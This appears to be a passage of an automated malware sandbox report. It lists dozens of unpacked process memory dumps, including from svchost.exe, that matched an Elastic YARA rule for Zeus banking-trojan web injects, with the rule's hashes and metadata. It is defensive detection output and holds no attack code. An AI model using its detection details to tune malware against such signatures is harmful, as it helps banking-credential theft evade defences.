Source: 25.2.NcYLgtXIKJgHj.exe.2f50000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.70.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bpfz752pYZ.exe.6f8dc8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.43.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.35.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.51.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.NcYLgtXIKJgHj.exe.2b92000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.NcYLgtXIKJgHj.exe.5e2000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.73.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.72.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ed00000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.NcYLgtXIKJgHj.exe.2b92000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bpfz752pYZ.exe.6f81c8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.34.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.54.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ee00000.74.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.69.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.NcYLgtXIKJgHj.exe.2792000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.41.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.57.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.NcYLgtXIKJgHj.exe.1520000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.56.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.NcYLgtXIKJgHj.exe.2fa2000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.70.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.NcYLgtXIKJgHj.exe.2ac0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.NcYLgtXIKJgHj.exe.3100000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
